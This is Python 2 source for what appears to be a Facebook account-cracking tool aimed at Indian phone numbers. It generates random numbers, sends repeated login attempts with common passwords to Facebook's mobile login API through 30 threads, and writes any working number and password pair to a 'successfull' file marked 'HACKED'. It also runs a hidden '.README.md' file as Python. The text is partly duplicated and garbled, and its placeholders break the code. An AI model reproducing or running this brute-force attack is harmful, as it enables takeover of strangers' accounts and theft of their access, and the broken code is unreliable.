data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass13 + '\n')
okb.close()
oks.append(c + user + pass13)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass13 + '\n')
cps.close()
cpb.append(c + user + pass13)
else:
pass14 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass14 + '\n')
okb.close()
oks.append(c + user + pass14)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass14 + '\n')
cps.close()
cpb.append(c + user + pass14)
else:
pass15 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass15 + '\n')
okb.close()
oks.append(c + user + pass15)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass15 + '\n')
cps.close()
cpb.append(c + user + pass15)
else:
pass16 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass16 + '\n')
okb.close()
oks.append(c + user + pass16)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass16 + '\n')
cps.close()
cpb.append(c + user + pass16)
pass17 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass17 + '\n')
okb.close()
oks.append(c + user + pass17)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass17 + '\n')
cps.close()
cpb.append(c + user + pass17)
else:
pass18 = 'password@'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass18 + '\n')
okb.close()
oks.append(c + user + pass18)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass18 + '\n')
cps.close()
cpb.append(c + user + pass18)
else:
pass19 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aab<PASSWORD>65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass19 + '\n')
okb.close()
oks.append(c + user + pass19)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass19 + '\n')
cps.close()
cpb.append(c + user + pass19)
else:
pass20 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass20 + '\n')
okb.close()
oks.append(c + user + pass20)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass20 + '\n')
cps.close()
cpb.append(c + user + pass20)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '-'
print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
os.system('python2 .README.md')
if __name__ == '__main__':
babaindseven() | bind/pypi_2.py | import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(98969):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(3.0 / 200)
def t():
time.sleep(1)
def cb():
os.system('clear')
logo = "\n\x1b[1;91m ______ \x1b[1;95m _____ __ __)\x1b[1;92m ______\n \x1b[1;91m (, / )\x1b[1;97m (, / (, /| / \x1b[1;92m (, / )\n \x1b[1;91m /---( \x1b[1;93m / / | / \x1b[1;92m / /\n\x1b[1;91m ) / ____)\x1b[1;94m___/__ ) / |/ \x1b[1;92m _/___ /_\n\x1b[1;91m(_/ ( (__\x1b[1;96m / (_/ ' \x1b[1;92m (_/___ / \n\x1b[1;90m AUTOMATIC ACCOUNT CRACKER BY \x1b[1;96mBOTOL BABA\n\x1b[1;97m--------------------------------------------------\n\x1b[1;95m\n AUTHOR : <NAME>\n FACEBOOK : FACEBOOK.COM/THEMEHTAN\n YOUTUBE : YOUTUBE.COM/MASTERTRICK1\n GITHUB : GITHUB.COM/BOTOLMEHEDI\n\x1b[1;32m\n--------------------------------------------------\n "
back = 0
successful = []
cpb = []
oks = []
id = []
def babaindseven():
os.system('clear')
print logo
print 'CRACK ONLY 7 DIGITS HACKABLE ACCOUNTS'
print
jalan('\x1b[1;91m [1] \x1b[1;93mSTART CRACK')
print
jalan('\x1b[1;92m [2] UPDATE TOOL')
print
jalan('\x1b[1;96m [3] BACK TO HOME')
print
jalan('\x1b[1;97m [0] EXIT')
print 50 * '-'
action()
def action():
global cpb
global oks
bch = raw_input('\n ===> ')
if bch == '':
print '[!] Fill in correctly'
action()
elif bch == '1':
os.system('clear')
print logo
print
try:
c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 954 TO 997 : ')
k = '+91'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
babaindseven()
elif bch == '2':
os.system('clear')
os.system('pip2 install --upgrade babaindseven')
os.system('clear')
print logo
print
psb('7 DIGIT INDIAN CRACKER UPDATED SUCCESSFULLY')
time.sleep(2)
os.system('python2 .README.md')
elif bch == '3':
os.system('python2 .README.md')
elif bch == '0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb('[\xe2\x9c\x93] TOTAL NUMBERS: ' + xxx)
time.sleep(0.5)
psb('[\xe2\x9c\x93] PLEASE WAIT, PROCESS IS RUNNING ...')
time.sleep(0.5)
psb('[!] TO STOP THIS PROCESS PRESS Ctrl THEN z')
time.sleep(0.5)
print 50 * '-'
print
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass4 + '\n')
okb.close()
oks.append(c + user + pass4)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
pass5 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass5 + '\n')
okb.close()
oks.append(c + user + pass5)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass5 + '\n')
cps.close()
cpb.append(c + user + pass5)
else:
pass6 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass6 + '\n')
okb.close()
oks.append(c + user + pass6)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass6 + '\n')
cps.close()
cpb.append(c + user + pass6)
else:
pass7 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass7 + '\n')
okb.close()
oks.append(c + user + pass7)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass7 + '\n')
cps.close()
cpb.append(c + user + pass7)
else:
pass8 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass8 + '\n')
okb.close()
oks.append(c + user + pass8)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass8 + '\n')
cps.close()
cpb.append(c + user + pass8)
pass9 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass9 + '\n')
okb.close()
oks.append(c + user + pass9)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass9 + '\n')
cps.close()
cpb.append(c + user + pass9)
else:
pass10 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass10 + '\n')
okb.close()
oks.append(c + user + pass10)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass10 + '\n')
cps.close()
cpb.append(c + user + pass10)
else:
pass11 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass11 + '\n')
okb.close()
oks.append(c + user + pass11)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass11 + '\n')
cps.close()
cpb.append(c + user + pass11)
else:
pass12 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass12 + '\n')
okb.close()
oks.append(c + user + pass12)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass12 + '\n')
cps.close()
cpb.append(c + user + pass12)
pass13 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass13 + '\n')
okb.close()
oks.append(c + user + pass13)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass13 + '\n')
cps.close()
cpb.append(c + user + pass13)
else:
pass14 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass14 + '\n')
okb.close()
oks.append(c + user + pass14)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass14 + '\n')
cps.close()
cpb.append(c + user + pass14)
else:
pass15 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass15 + '\n')
okb.close()
oks.append(c + user + pass15)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass15 + '\n')
cps.close()
cpb.append(c + user + pass15)
else:
pass16 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass16 + '\n')
okb.close()
oks.append(c + user + pass16)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass16 + '\n')
cps.close()
cpb.append(c + user + pass16)
pass17 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass17 + '\n')
okb.close()
oks.append(c + user + pass17)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass17 + '\n')
cps.close()
cpb.append(c + user + pass17)
else:
pass18 = 'password@'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass18 + '\n')
okb.close()
oks.append(c + user + pass18)
